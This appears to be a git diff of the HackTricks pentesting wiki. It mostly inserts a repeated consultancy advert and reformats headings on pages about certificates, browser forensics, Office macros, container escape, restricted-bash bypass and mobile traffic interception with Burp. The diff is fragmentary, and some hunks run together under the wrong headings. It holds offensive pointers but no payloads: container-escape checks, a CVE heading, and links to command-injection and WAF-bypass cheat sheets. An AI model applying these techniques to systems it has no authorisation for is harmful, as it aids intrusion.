.png){kind=logo}
-{% embed url="https://www.pentestgeek.com/penetration-testing/hacking-jenkins-servers-with-no-password" %}
+Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
+{% embed url="https://securityhubs.io/" %}
+{% endhint %}
@@ -208,5 +228,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
diff --git a/cryptography/certificates.md b/cryptography/certificates.md
index a3253bb8e..fb581615e 100644
--- a/cryptography/certificates.md
+++ b/cryptography/certificates.md
@@ -1,4 +1,4 @@
-
+# Certificates
@@ -16,8 +16,15 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+{% hint style="danger" %}
+
-# What is a Certificate
+Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
+
+{% embed url="https://securityhubs.io/" %}
+{% endhint %}
+
+## What is a Certificate
In cryptography, a **public key certificate,** also known as a **digital certificate** or **identity certificate,** is an electronic document used to prove the ownership of a public key. The certificate includes information about the key, information about the identity of its owner (called the subject), and the digital signature of an entity that has verified the certificate's contents (called the issuer). If the signature is valid, and the software examining the certificate trusts the issuer, then it can use that key to communicate securely with the certificate's subject.
@@ -25,7 +32,7 @@ In a typical [public-key infrastructure](https://en.wikipedia.org/wiki/Public-ke
The most common format for public key certificates is defined by [X.509](https://en.wikipedia.org/wiki/X.509). Because X.509 is very general, the format is further constrained by profiles defined for certain use cases, such as [Public Key Infrastructure (X.509)](https://en.wikipedia.org/wiki/PKIX) as defined in RFC 5280.
-# x509 Common Fields
+## x509 Common Fields
* **Version Number:** Version of x509 format.
* **Serial Number**: Used to uniquely identify the certificate within a CA's systems. In particular this is used to track revocation information.
@@ -68,13 +75,13 @@ The most common format for public key certificates is defined by [X.509](https:/
* **CRL Distribution Points**: This extension identifies the location of the CRL from which the revocation of this certificate can be checked. The application that processes the certificate can get the location of the CRL from this extension, download the CRL and then check the revocation of this certificate.
* **CT Precertificate SCTs**: Logs of Certificate transparency regarding the certificate
-## Difference between OCSP and CRL Distribution Points
+### Difference between OCSP and CRL Distribution Points
**OCSP** (RFC 2560) is a standard protocol that consists of an **OCSP client and an OCSP responder**. This protocol **determines revocation status of a given digital public-key certificate** **without** having to **download** the **entire CRL**.\
**CRL** is the **traditional method** of checking certificate validity. A **CRL provides a list of certificate serial numbers** that have been revoked or are no longer valid. CRLs let the verifier check the revocation status of the presented certificate while verifying it. CRLs are limited to 512 entries.\
-From [here](https://www.arubanetworks.com/techdocs/ArubaOS%206\_3\_1\_Web\_Help/Content/ArubaFrameStyles/CertRevocation/About\_OCSP\_and\_CRL.htm#:\~:text=OCSP%20\(RFC%202560\)%20is%20a,to%20download%20the%20entire%20CRL.\&text=A%20CRL%20provides%20a%20list,or%20are%20no%20longer%20valid.).
+From [here](https://www.arubanetworks.com/techdocs/ArubaOS%206\_3\_1\_Web\_Help/Content/ArubaFrameStyles/CertRevocation/About\_OCSP\_and\_CRL.htm).
-## What is Certificate Transparency
+### What is Certificate Transparency
Certificate Transparency aims to remedy certificate-based threats by **making the issuance and existence of SSL certificates open to scrutiny by domain owners, CAs, and domain users**. Specifically, Certificate Transparency has three main goals:
@@ -82,27 +89,27 @@ Certificate Transparency aims to remedy certificate-based threats by **making th
* Provide an **open auditing and monitoring system that lets any domain owner or CA determine whether certificates have been mistakenly or maliciously** issued.
* **Protect users** (as much as possible) from being duped by certificates that were mistakenly or maliciously issued.
-### **Certificate Logs**
+#### **Certificate Logs**
Certificate logs are simple network services that maintain **cryptographically assured, publicly auditable, append-only records of certificates**. **Anyone can submit certificates to a log**, although certificate authorities will likely be the foremost submitters. Likewise, anyone can query a log for a cryptographic proof, which can be used to verify that the log is behaving properly or verify that a particular certificate has been logged. The number of log servers doesn’t have to be large (say, much less than a thousand worldwide), and each could be operated independently by a CA, an ISP, or any other interested party.
-### Query
+#### Query
You can query the logs of Certificate Transparency of any domain in [https://crt.sh/](https://crt.sh).
-# Formats
+## Formats
There are different formats that can be used to store a certificate.
-### **PEM Format**
+#### **PEM Format**
* It is the most common format used for certificates
* Most servers (Ex: Apache) expects the certificates and private key to be in a separate files\
- \- Usually they are Base64 encoded ASCII files\
- \- Extensions used for PEM certificates are .cer, .crt, .pem, .key files\
- \- Apache and similar server uses PEM format certificates
+ \- Usually they are Base64 encoded ASCII files\
+ \- Extensions used for PEM certificates are .cer, .crt, .pem, .key files\
+ \- Apache and similar server uses PEM format certificates
-### **DER Format**
+#### **DER Format**
* The DER format is the binary form of the certificate
* All types of certificates & private keys can be encoded in DER format
@@ -110,19 +117,19 @@ There are different formats that can be used to store a certificate.
* DER formatted certificates most often use the ‘.cer’ and '.der' extensions
* DER is typically used in Java Platforms
-### **P7B/PKCS#7 Format**
+#### **P7B/PKCS#7 Format**
* The PKCS#7 or P7B format is stored in Base64 ASCII format and has a file extension of .p7b or .p7c
* A P7B file only contains certificates and chain certificates (Intermediate CAs), not the private key
* The most common platforms that support P7B files are Microsoft Windows and Java Tomcat
-### **PFX/P12/PKCS#12 Format**
+#### **PFX/P12/PKCS#12 Format**
* The PKCS#12 or PFX/P12 format is a binary format for storing the server certificate, intermediate certificates, and the private key in one encryptable file
* These files usually have extensions such as .pfx and .p12
* They are typically used on Windows machines to import and export certificates and private keys
-## Formats conversions
+### Formats conversions
**Convert x509 to PEM**
@@ -130,7 +137,7 @@ There are different formats that can be used to store a certificate.
openssl x509 -in certificatename.cer -outform PEM -out certificatename.pem
```
-### **Convert PEM to DER**
+#### **Convert PEM to DER**
```
openssl x509 -outform der -in certificatename.pem -out certificatename.der
@@ -194,6 +201,13 @@ openssl pkcs7 -print_certs -in certificatename.p7b -out certificatename.cer
openssl pkcs12 -export -in certificatename.cer -inkey privateKey.key -out certificatename.pfx -certfile cacert.cer
```
+{% hint style="danger" %}
+
+
+Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
+
+{% embed url="https://securityhubs.io/" %}
+{% endhint %}
@@ -210,5 +224,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md
index ef7b96312..4870a5cc9 100644
--- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md
+++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md
@@ -1,4 +1,4 @@
-
+# Browser Artifacts
@@ -16,8 +16,15 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+{% hint style="danger" %}
+.png){kind=logo}
-# Browsers Artefacts
+Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
+
+{% embed url="https://securityhubs.io/" %}
+{% endhint %}
+
+## Browsers Artefacts
When we talk about browser artefacts we talk about, navigation history, bookmarks, list of downloaded files, cache data…etc.
@@ -35,19 +42,19 @@ Let us take a look at the most common artefacts stored by browsers.
* **Logins :** Self Explanatory.
* **Favicons :** They are the little icons found in tabs, urls, bookmarks and the such. They can be used as another source to get more information about the website or places the user visited.
* **Browser Sessions :** Self Explanatory.
-* **Downloads :**Self Explanatory.
+* \*\*Downloads :\*\*Self Explanatory.
* **Form Data :** Anything typed inside forms is often times stored by the browser, so the next time the user enters something inside of a form the browser can suggest previously entered data.
* **Thumbnails :** Self Explanatory.
-# Firefox
+## Firefox
-Firefox use to create the profiles folder in \~/_**.mozilla/firefox/**_ (Linux), in **/Users/$USER/Library/Application Support/Firefox/Profiles/** (MacOS), _**%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\\**_ (Windows)_**.**_\
+Firefox use to create the profiles folder in \~/_**.mozilla/firefox/**_ (Linux), in **/Users/$USER/Library/Application Support/Firefox/Profiles/** (MacOS), _**%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\\**_ (Windows)_**.**_\
Inside this folder, the file _**profiles.ini**_ should appear with the name(s) of the used profile(s).\
-Each profile has a "**Path**" variable with the name of the folder where it's data is going to be stored. The folder should be **present in the same directory where the **_**profiles.ini**_** exist**. If it isn't, then, probably it was deleted.
+Each profile has a "**Path**" variable with the name of the folder where it's data is going to be stored. The folder should be **present in the same directory where the \_profiles.ini**\_\*\* exist\*\*. If it isn't, then, probably it was deleted.
Inside the folder **of each profile** (_\~/.mozilla/firefox/\
+
+Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
+
+{% embed url="https://securityhubs.io/" %}
+{% endhint %}
@@ -281,5 +295,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md
index 8372725aa..0b41f82a3 100644
--- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md
+++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md
@@ -1,4 +1,4 @@
-
+# Local Cloud Storage
@@ -16,8 +16,15 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+{% hint style="danger" %}
+
-# OneDrive
+Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
+
+{% embed url="https://securityhubs.io/" %}
+{% endhint %}
+
+## OneDrive
In Windows you can find the OneDrive folder in `\Users\
+
+Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
+
+{% embed url="https://securityhubs.io/" %}
+{% endhint %}
@@ -129,5 +143,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md
index ecfff9dfb..3e00bb343 100644
--- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md
+++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md
@@ -1,4 +1,4 @@
-
+# Office file analysis
@@ -16,8 +16,15 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+{% hint style="danger" %}
+
-# Introduction
+Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
+
+{% embed url="https://securityhubs.io/" %}
+{% endhint %}
+
+## Introduction
Microsoft has created **dozens of office document file formats**, many of which are popular for the distribution of phishing attacks and malware because of their ability to **include macros** (VBA scripts).
@@ -74,22 +81,21 @@ Sometimes the challenge is not to find hidden static data, but to **analyze a VB
$ soffice path/to/test.docx macro://./standard.module1.mymacro
```
-# [oletools](https://github.com/decalage2/oletools)
+## [oletools](https://github.com/decalage2/oletools)
```bash
sudo pip3 install -U oletools
olevba -c /path/to/document #Extract macros
```
-# Automatic Execution
+## Automatic Execution
Macro functions like `AutoOpen`, `AutoExec` or `Document_Open` will be **automatically** **executed**.
-# References
+## References
* [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/)
-
Support HackTricks and get benefits!
@@ -105,5 +111,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
@@ -16,6 +16,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+{% hint style="danger" %}
+
+
+Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
+
+{% embed url="https://securityhubs.io/" %}
+{% endhint %}
From: [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/)
@@ -37,10 +44,6 @@ When exploring PDF content for hidden data, some of the hiding places to check i
There are also several Python packages for working with the PDF file format, like [PeepDF](https://github.com/jesparza/peepdf), that enable you to write your own parsing scripts.
-
-
-
-
Support HackTricks and get benefits!
@@ -56,5 +59,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**.png){kind=logo}
+
+Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
+
+{% embed url="https://securityhubs.io/" %}
+{% endhint %}
+
## Automatic Enumeration & Escape
* [**linpeas**](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS): It can also **enumerate containers**
@@ -447,6 +455,14 @@ If you only have `hostIPC=true`, you most likely can't do much. If any process o
* **Inspect /dev/shm** - Look for any files in this shared memory location: `ls -la /dev/shm`
* **Inspect existing IPC facilities** – You can check to see if any IPC facilities are being used with `/usr/bin/ipcs`. Check it with: `ipcs -a`
+{% hint style="danger" %}
+
+
+Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
+
+{% embed url="https://securityhubs.io/" %}
+{% endhint %}
+
## CVEs
### Runc exploit (CVE-2019-5736)
@@ -490,6 +506,14 @@ If you are in **userspace** (**no kernel exploit** involved) the way to find new
* [https://0xn3va.gitbook.io/cheat-sheets/container/escaping/exposed-docker-socket](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/exposed-docker-socket)
* [https://bishopfox.com/blog/kubernetes-pod-privilege-escalation#Pod4](https://bishopfox.com/blog/kubernetes-pod-privilege-escalation#Pod4)
+{% hint style="danger" %}
+
+
+Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
+
+{% embed url="https://securityhubs.io/" %}
+{% endhint %}
+
Support HackTricks and get benefits!
diff --git a/linux-hardening/useful-linux-commands/bypass-bash-restrictions.md b/linux-hardening/useful-linux-commands/bypass-bash-restrictions.md index ac31b0dfd..ed13ed8cc 100644 --- a/linux-hardening/useful-linux-commands/bypass-bash-restrictions.md +++ b/linux-hardening/useful-linux-commands/bypass-bash-restrictions.md @@ -16,6 +16,14 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com).png){kind=logo}
+
+Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
+
+{% embed url="https://securityhubs.io/" %}
+{% endhint %}
+
## Common Limitations Bypasses
### Reverse Shell
@@ -165,13 +173,18 @@ If you are inside a filesystem with the **read-only and noexec protections** the
## References & More
-{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#exploits" %}
+* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#exploits](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#exploits)
+* [https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet](https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet)
+* [https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0](https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0)
+* [https://www.secjuice.com/web-application-firewall-waf-evasion/](https://www.secjuice.com/web-application-firewall-waf-evasion/)
-{% embed url="https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet" %}
+{% hint style="danger" %}
+
-{% embed url="https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0" %}
+Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
-{% embed url="https://www.secjuice.com/web-application-firewall-waf-evasion/" %}
+{% embed url="https://securityhubs.io/" %}
+{% endhint %}
diff --git a/mobile-pentesting/android-app-pentesting/android-burp-suite-settings.md b/mobile-pentesting/android-app-pentesting/android-burp-suite-settings.md
index b882fcba6..531847c96 100644
--- a/mobile-pentesting/android-app-pentesting/android-burp-suite-settings.md
+++ b/mobile-pentesting/android-app-pentesting/android-burp-suite-settings.md
@@ -1,4 +1,4 @@
-
+# Burp Suite Configuration for Android
+
+Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
+
+{% embed url="https://securityhubs.io/" %}
+{% endhint %}
**This tutorial was taken from:** [**https://medium.com/@ehsahil/basic-android-security-testing-lab-part-1-a2b87e667533**](https://medium.com/@ehsahil/basic-android-security-testing-lab-part-1-a2b87e667533)
-# Add a proxy in Burp Suite to listen.
+## Add a proxy in Burp Suite to listen.
Address: **192.168.56.1** & Port: **1337**
@@ -27,7 +34,7 @@ Choose _**All Interfaces**_ option.
-# **Adding listener in Android device.**
+## **Adding listener in Android device.**
Setting → Wifi →WiredSSID (Long press)
@@ -47,7 +54,7 @@ Testing connection over http and https using devices browser.
-# **Installing burp certificate in android device.**
+## **Installing burp certificate in android device.**
Download burp certificate. — Use your desktop machine to download the certificate.
@@ -85,6 +92,13 @@ After installing Certificate SSL endpoints also working fine tested using → [h
After installing the certificate this way Firefox for Android won't use it (based on my tests), so use a different browser.
{% endhint %}
+{% hint style="danger" %}
+
+
+Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
+
+{% embed url="https://securityhubs.io/" %}
+{% endhint %}
+
+Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
+
+{% embed url="https://securityhubs.io/" %}
+{% endhint %}
+
## iOS Pentesting
@@ -16,10 +16,17 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+{% hint style="danger" %}
+
+
+Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
+
+{% embed url="https://securityhubs.io/" %}
+{% endhint %}
**This tutorial was taken from:** [**https://medium.com/@ehsahil/basic-android-security-testing-lab-part-1-a2b87e667533**](https://medium.com/@ehsahil/basic-android-security-testing-lab-part-1-a2b87e667533)
-# Add a proxy in Burp Suite to listen.
+## Add a proxy in Burp Suite to listen.
Address: **192.168.56.1** & Port: **1337**
@@ -27,7 +34,7 @@ Choose _**All Interfaces**_ option.
-# **Adding listener in Android device.**
+## **Adding listener in Android device.**
Setting → Wifi →WiredSSID (Long press)
@@ -47,7 +54,7 @@ Testing connection over http and https using devices browser.
-# **Installing burp certificate in android device.**
+## **Installing burp certificate in android device.**
Download burp certificate. — Use your desktop machine to download the certificate.
@@ -85,6 +92,13 @@ After installing Certificate SSL endpoints also working fine tested using → [h
After installing the certificate this way Firefox for Android won't use it (based on my tests), so use a different browser.
{% endhint %}
+{% hint style="danger" %}
+
+
+Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
+
+{% embed url="https://securityhubs.io/" %}
+{% endhint %}
@@ -101,5 +115,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
diff --git a/mobile-pentesting/ios-pentesting/README.md b/mobile-pentesting/ios-pentesting/README.md
index 906f148a2..2da9acce5 100644
--- a/mobile-pentesting/ios-pentesting/README.md
+++ b/mobile-pentesting/ios-pentesting/README.md
@@ -1,5 +1,13 @@
# iOS Pentesting
+{% hint style="danger" %}
+
+
+Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
+
+{% embed url="https://securityhubs.io/" %}
+{% endhint %}
+
## iOS Pentesting
@@ -380,6 +388,14 @@ struct CGSize {
However, the best options to disassemble the binary are: [**Hopper**](https://www.hopperapp.com/download.html?) and [**IDA**](https://www.hex-rays.com/products/ida/support/download\_freeware/).
+{% hint style="danger" %}
+
+
+Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
+
+{% embed url="https://securityhubs.io/" %}
+{% endhint %}
+
## Data Storage
To learn about how iOS stores data in the device read this page:
@@ -734,6 +750,14 @@ Jun 7 13:42:14 iPhone touch[9708] : MS:Notice: Injecting: (null) [touch
...
```
+{% hint style="danger" %}
+
+
+Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
+
+{% embed url="https://securityhubs.io/" %}
+{% endhint %}
+
## Backups
iOS includes auto-backup features that create copies of the data stored on the device. You can **make iOS backups** from your host computer by using iTunes (till macOS Catalina) or Finder (from macOS Catalina onwards), or via the iCloud backup feature. In both cases, the backup includes nearly all data stored on the iOS device except highly sensitive data such as Apple Pay information and Touch ID settings.
@@ -1152,6 +1176,14 @@ You can find the **libraries used by an application** by running **`otool`** aga
* [https://github.com/authenticationfailure/WheresMyBrowser.iOS](https://github.com/authenticationfailure/WheresMyBrowser.iOS)
* [https://github.com/nabla-c0d3/ssl-kill-switch2](https://github.com/nabla-c0d3/ssl-kill-switch2)
+{% hint style="danger" %}
+
+
+Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
+
+{% embed url="https://securityhubs.io/" %}
+{% endhint %}
+
-# Burp Cert Installation in physical iOS
+Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
+
+{% embed url="https://securityhubs.io/" %}
+{% endhint %}
+
+## Burp Cert Installation in physical iOS
You can install [**Burp Mobile Assistant**](https://portswigger.net/burp/documentation/desktop/tools/mobile-assistant/installing) **for help installing the Burp Certificate, configure the proxy and perform SSL Pinning.**\
Or you can manually follow the next steps:
-* Configure **Burp** as the iPhone **proxy in **_**Settings**_** --> **_**Wifi**_** --> **_**Click the network**_** --> **_**Proxy**_
+* Configure **Burp** as the iPhone **proxy in \_Settings**_\*\* --> \*\*_**Wifi**_\*\* --> \*\*_**Click the network**_\*\* --> \*\*_**Proxy**\_
* Access `http://burp` and download the certificate
* Access _**Setting**_ --> _**Profile Downloaded**_ and **Install** it (you will be asked your code)
* Access _**Settings**_ --> _**General**_ --> _**About**_ --> _**Certificate Trust Settings**_ and enable PortSwigger CA
-## Setting up an Interception Proxy via localhost
+### Setting up an Interception Proxy via localhost
Setting up Burp to proxy your traffic is pretty straightforward. We assume that both your iOS device and host computer are connected to a Wi-Fi network that permits client-to-client traffic. If client-to-client traffic is not permitted, you can use usbmuxd to connect to Burp via USB.
PortSwigger provides a good [tutorial on setting up an iOS device to work with Burp](https://support.portswigger.net/customer/portal/articles/1841108-configuring-an-ios-device-to-work-with-burp) and a [tutorial on installing Burp's CA certificate to an iOS device](https://support.portswigger.net/customer/portal/articles/1841109-installing-burp-s-ca-certificate-in-an-ios-device).
-### Using Burp via USB on a Jailbroken Device
+#### Using Burp via USB on a Jailbroken Device
When doing dynamic analysis, it's interesting to use the SSH connection to route our traffic to Burp that is running on our computer. Let's get started:
@@ -61,7 +68,7 @@ The last step would be to set the proxy globally on your iOS device:
5. Type in 127.0.0.1 as **Server**
6. Type in 8080 as **Port**
-## Full Network Monitoring/Sniffing
+### Full Network Monitoring/Sniffing
If you need to **monitor something different from HTTP communications** you can sniff all the device traffic with **wireshark**.\
You can remotely sniff all traffic in real-time on iOS by [creating a Remote Virtual Interface](https://stackoverflow.com/questions/9555403/capturing-mobile-phone-traffic-on-wireshark/33175819#33175819) for your iOS device. First make sure you have **Wireshark** **installed** on your macOS host computer.
@@ -85,7 +92,7 @@ ip.addr == 192.168.1.1 && http
The documentation of Wireshark offers many examples for [Capture Filters](https://wiki.wireshark.org/CaptureFilters) that should help you to filter the traffic to get the information you want.
-# Burp Cert Installation in Simulator
+## Burp Cert Installation in Simulator
* **Export Burp Certificate**
